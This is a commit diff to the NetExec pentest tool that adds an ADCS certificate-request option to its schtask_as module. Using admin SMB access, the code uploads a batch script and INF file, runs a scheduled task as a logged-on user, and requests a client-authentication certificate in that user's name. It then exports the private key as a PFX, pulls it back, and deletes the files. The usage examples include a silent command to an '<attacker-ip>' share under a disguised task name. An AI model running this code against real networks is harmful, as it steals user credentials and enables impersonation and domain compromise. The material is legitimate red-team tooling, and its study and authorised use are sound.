Merge pull request Pennyw0rth#908 from Dfte/schtaskas_certreq

NeffIsBack · web-flow · commit 32c1a4aff29a · 2025-09-23T05:43:33.000-04:00
Add certificate request options to schtask_as
diff --git a/nxc/modules/schtask_as.py b/nxc/modules/schtask_as.py
@@ -1,6 +1,12 @@
-import os
+from time import sleep
+from io import BytesIO
+from textwrap import dedent
+from os import path, makedirs
 from traceback import format_exc
+
+from nxc.paths import NXC_PATH
 from nxc.helpers.misc import CATEGORY
+from nxc.helpers.misc import gen_random_string
 from nxc.protocols.smb.atexec import TSCH_EXEC
 
 
@@ -11,6 +17,7 @@ class NXCModule:
     Modified by @Defte_ so that output on multiples lines are printed correctly (28/04/2025)
     Modified by @Defte_ so that we can upload a custom binary to execute using the BINARY option (28/04/2025)
     Modified by @SGMG11 to execute the task without output
+    Modified by @Defte_ to add certificate request on behalf of someone options
     """
     name = "schtask_as"
     description = "Remotely execute a scheduled task as a logged on user"
@@ -26,69 +33,136 @@ def options(self, context, module_options):
         FILE           OPTIONAL: Set a name for the command output file
         LOCATION       OPTIONAL: Set a location for the command output file (e.g. 'C:\\Windows\\Temp\\')
         SILENTCOMMAND  OPTIONAL: Do not retrieve output
+        CA             OPTIONAL: Set the Certificate Authority name to ask the certificate from (i.e: SERVER\\CA_NAME)
+        TEMPLATE       OPTIONAL: Set the name of the template to request a certificate from
 
         Example:
         -------
         nxc smb <ip> -u <user> -p <password> -M schtask_as -o USER=Administrator CMD=whoami
         nxc smb <ip> -u <user> -p <password> -M schtask_as -o USER=Administrator CMD='bin.exe --option' BINARY=bin.exe
         nxc smb <ip> -u <user> -p <password> -M schtask_as -o USER=Administrator CMD='dir \\<attacker-ip>\pwn' TASK='Legit Task' SILENTCOMMAND='True'
+        nxc smb <ip> -u <user> -p <password> -M schtask_as -o USER=Administrator CMD=certreq CA='ADCS\whiteflag-ADCS-CA' TEMPLATE=User
         """
-        self.command_to_run = self.binary_to_upload = self.run_task_as = self.task_name = self.output_filename = self.output_file_location = self.time = None
+        self.logger = context.log
+        self.command_to_run = self.binary_to_upload = self.run_task_as = self.task_name = self.output_filename = self.output_file_location = self.time = self.ca_name = self.template_name = None
         self.share = "C$"
-        self.tmp_dir = "C:\\Windows\\Temp\\"
-        self.tmp_path = self.tmp_dir.split(":")[1]
-        self.show_output = True
-
-        if "CMD" in module_options:
-            self.command_to_run = module_options["CMD"]
-
-        if "BINARY" in module_options:
-            self.binary_to_upload = module_options["BINARY"]
-
-        if "USER" in module_options:
-            self.run_task_as = module_options["USER"]
-
-        if "TASK" in module_options:
-            self.task_name = module_options["TASK"]
-
-        if "FILE" in module_options:
-            self.output_filename = module_options["FILE"]
-
-        if "LOCATION" in module_options:
-            # Ensure trailing backslashes
-            self.output_file_location = module_options["LOCATION"].rstrip("\\") + "\\"
-
-        if "SILENTCOMMAND" in module_options and module_options["SILENTCOMMAND"] in ["True", "yes", "1"]:
-            self.show_output = False
+        self.output_file_location = "\\Windows\\Temp"
+
+        # Basic schtask_as parameters
+        self.command_to_run = module_options.get("CMD")
+        self.binary_to_upload = module_options.get("BINARY")
+        self.run_task_as = module_options.get("USER")
+
+        # Task customization options
+        self.task_name = module_options.get("TASK")
+        self.output_filename = module_options.get("FILE", gen_random_string(8))
+        self.output_file_location = module_options.get("LOCATION", self.output_file_location).rstrip("\\")
+        self.show_output = module_options.get("SILENTCOMMAND", "").lower() not in {"true", "yes", "1"}
+
+        # ADCS certificate request options
+        self.ca_name = module_options.get("CA")
+        if self.ca_name:
+            if "\\" not in self.ca_name:
+                context.log.fail("CA name must be in the following format: SERVER_NAME\\CertificateAuthority_Name")
+                exit(1)
+            elif "\\\\" in self.ca_name:
+                self.ca_name = self.ca_name.replace("\\\\", "\\")
+        self.template_name = module_options.get("TEMPLATE")
 
     def on_admin_login(self, context, connection):
-        self.logger = context.log
 
         if self.command_to_run is None:
             self.logger.fail("You need to specify a CMD to run")
             return
 
         if self.run_task_as is None:
-            self.logger.fail("You need to specify a USER to run the command as")
+            self.logger.fail("You need to specify a USER to run the task as")
             return
 
-        if self.show_output is False:
-            self.logger.display("Command will be executed silently without output")
+        if self.command_to_run.lower() == "certreq":
+            if self.ca_name is None:
+                self.logger.fail("CertReq requires the CA name in the following format: SERVER_NAME\\CertificateAuthority_Name")
+                return
+
+            if self.template_name is None:
+                self.logger.fail("CertReq requires the template to request a certificate from")
+                return
+
+            tmp_share = self.share.replace("$", ":")
+            full_path_prefixed_file = f"{tmp_share}\\{self.output_file_location}\\{self.output_filename}"
+            batch_file = BytesIO(dedent(f"""
+            @echo off
+            setlocal enabledelayedexpansion
+
+            certreq -new {full_path_prefixed_file}.inf {full_path_prefixed_file}.req > nul
+            certreq -submit -config {self.ca_name} {full_path_prefixed_file}.req {full_path_prefixed_file}.cer > nul
+
+            set "HASH="
+
+            for /f "usebackq tokens=* delims=" %%L in (`certreq -accept {full_path_prefixed_file}.cer`) do (
+                set "line=%%L"
+
+                for /f "tokens=2* delims=:" %%X in ("!line!") do (
+                    set "candidate=%%X"
+                    set "candidate=!candidate:~1!"
+                    echo !candidate! | findstr /R "^[0-9A-Fa-f][0-9A-Fa-f]*" > nul
+                    if not errorlevel 1 (
+                        if "!candidate:~40!"=="" (
+                            set "HASH=!candidate!"
+                            certutil -user -exportPFX -p "" !HASH! {full_path_prefixed_file}.pfx > nul
+                        )
+                    )
+                )
+            )
+            exit
+            """).encode())
+            connection.conn.putFile(self.share, f"{self.output_file_location}\\{self.output_filename}.bat", batch_file.read)
+            self.logger.success("Upload batch file successfully")
+
+            inf_file = BytesIO(dedent(f"""
+            [Version]
+            Signature="$Windows NT$"
+
+            [NewRequest]
+            Subject = "CN={self.run_task_as}"
+            KeySpec = 1
+            KeyLength = 2048
+            Exportable = TRUE
+            MachineKeySet = FALSE
+            SMIME = FALSE
+            PrivateKeyArchive = FALSE
+            UserProtected = FALSE
+            UseExistingKeySet = FALSE
+            ProviderName = "Microsoft RSA SChannel Cryptographic Provider"
+            ProviderType = 12
+            RequestType = PKCS10
+            KeyUsage = 0xa0
+
+            [EnhancedKeyUsageExtension]
+            OID=1.3.6.1.5.5.7.3.2
+
+            [RequestAttributes]
+            CertificateTemplate = {self.template_name}
+            """).encode())
+            connection.conn.putFile(self.share, f"{self.output_file_location}\\{self.output_filename}.inf", inf_file.read)
+            self.logger.success("Upload INF file successfully")
+
+            self.command_to_run = f"{full_path_prefixed_file}.bat"
 
         if self.binary_to_upload:
-            if not os.path.isfile(self.binary_to_upload):
+            if not path.isfile(self.binary_to_upload):
                 self.logger.fail(f"Cannot find {self.binary_to_upload}")
                 return
             else:
                 self.logger.display(f"Uploading {self.binary_to_upload}")
-                binary_file_location = self.tmp_path if self.output_file_location is None else self.output_file_location
                 with open(self.binary_to_upload, "rb") as binary_to_upload:
                     try:
-                        self.binary_to_upload_name = os.path.basename(self.binary_to_upload)
-                        connection.conn.putFile(self.share, f"{binary_file_location}{self.binary_to_upload_name}", binary_to_upload.read)
-                        self.logger.success(f"Binary {self.binary_to_upload_name} successfully uploaded in {binary_file_location}{self.binary_to_upload_name}")
+                        self.binary_to_upload_name = path.basename(self.binary_to_upload)
+                        connection.conn.putFile(self.share, f"{self.output_file_location}\\{self.binary_to_upload_name}", binary_to_upload.read)
+                        self.command_to_run = f"{self.output_file_location}\\{self.command_to_run}"
+                        self.logger.success(f"Binary {self.binary_to_upload_name} successfully uploaded in {self.output_file_location}\\{self.binary_to_upload_name}")
                     except Exception as e:
-                        self.logger.fail(f"Error writing file to share {binary_file_location}: {e}")
+                        self.logger.fail(f"Error writing file to {self.output_file_location}: {e}")
                         return
 
         self.logger.display("Connecting to the remote Service control endpoint")
@@ -114,7 +188,11 @@ def on_admin_login(self, context, connection):
                 self.output_file_location,
             )
 
-            self.logger.display(f"Executing '{self.command_to_run}' as '{self.run_task_as}'")
+            if self.show_output is False:
+                self.logger.display(f"Silently executing '{self.command_to_run}' as '{self.run_task_as}'")
+            else:
+                self.logger.display(f"Executing '{self.command_to_run}' as '{self.run_task_as}'")
+
             output = exec_method.execute(self.command_to_run, self.show_output)
 
             try:
@@ -127,13 +205,35 @@ def on_admin_login(self, context, connection):
                 for line in output.splitlines():
                     self.logger.highlight(line.rstrip())
 
-        except Exception:
-            self.logger.debug("Error executing command via atexec, traceback:")
+        except Exception as e:
+            self.logger.fail(f"Error executing command via atexec: {e}")
             self.logger.debug(format_exc())
         finally:
             if self.binary_to_upload:
                 try:
-                    connection.conn.deleteFile(self.share, f"{binary_file_location}{self.binary_to_upload_name}")
-                    context.log.success(f"Binary {binary_file_location}{self.binary_to_upload_name} successfully deleted")
+                    connection.conn.deleteFile(self.share, f"{self.output_file_location}\\{self.binary_to_upload_name}")
+                    self.logger.success(f"Binary {self.output_file_location}\\{self.binary_to_upload_name} successfully deleted")
                 except Exception as e:
-                    context.log.fail(f"Error deleting {binary_file_location}{self.binary_to_upload_name} on {self.share}: {e}")
+                    self.logger.fail(f"Error deleting {self.output_file_location}{self.binary_to_upload_name} on {self.share}: {e}")
+
+            if self.ca_name and self.template_name:
+
+                dump_path = path.join(NXC_PATH, "modules/schtask_as")
+                if not path.isdir(dump_path):
+                    makedirs(dump_path)
+
+                # This sleep is required as the computing of the pfx file takes some time
+                sleep(2)
+                with open(path.join(dump_path, f"{self.run_task_as}.pfx"), "wb+") as dump_file:
+                    try:
+                        connection.conn.getFile(self.share, f"{self.output_file_location}\\{self.output_filename}.pfx", dump_file.write)
+                        self.logger.success(f"PFX file stored in {dump_path}/{self.run_task_as}.pfx")
+                    except Exception as e:
+                        self.logger.fail(f"Error while getting {self.output_file_location}\\{self.output_filename}.pfx: {e}")
+
+                for ext in [".bat", ".inf", ".cer", ".req", ".rsp", ".pfx", ""]:
+                    try:
+                        connection.conn.deleteFile(self.share, f"{self.output_file_location}\\{self.output_filename}{ext}")
+                        self.logger.debug(f"Successfully deleted {self.output_file_location}\\{self.output_filename}{ext}")
+                    except Exception as e:
+                        self.logger.debug(f"Couldn't delete {self.output_file_location}\\{self.output_filename}{ext} : {e}")
diff --git a/nxc/protocols/smb/atexec.py b/nxc/protocols/smb/atexec.py
@@ -74,8 +74,8 @@ def output_callback(self, data):
         self.__outputBuffer = data
 
     def get_end_boundary(self):
-        # Get current date and time + 5 minutes
-        end_boundary = datetime.now() + timedelta(minutes=5)
+        # Get current date and time + 1 day
+        end_boundary = datetime.now() + timedelta(days=1)
 
         # Format it to match the format in the XML: "YYYY-MM-DDTHH:MM:SS.ssssss"
         return end_boundary.strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3]
@@ -196,14 +196,17 @@ def execute_handler(self, command):
                 self.logger.fail(str(e))
             return
 
-        done = False
-        while not done:
-            self.logger.debug(f"Calling SchRpcGetLastRunInfo for \\{self.task_name}")
-            resp = tsch.hSchRpcGetLastRunInfo(dce, f"\\{self.task_name}")
-            if resp["pLastRuntime"]["wYear"] != 0:
-                done = True
-            else:
-                sleep(2)
+        try:
+            done = False
+            while not done:
+                self.logger.debug(f"Calling SchRpcGetLastRunInfo for \\{self.task_name}")
+                resp = tsch.hSchRpcGetLastRunInfo(dce, f"\\{self.task_name}")
+                if resp["pLastRuntime"]["wYear"] != 0:
+                    done = True
+                else:
+                    sleep(2)
+        except tsch.DCERPCSessionError as e:
+            self.logger.fail(f"Error retrieving task last run info: {e}")
 
         self.logger.info(f"Deleting task \\{self.task_name}")
         tsch.hSchRpcDelete(dce, f"\\{self.task_name}")
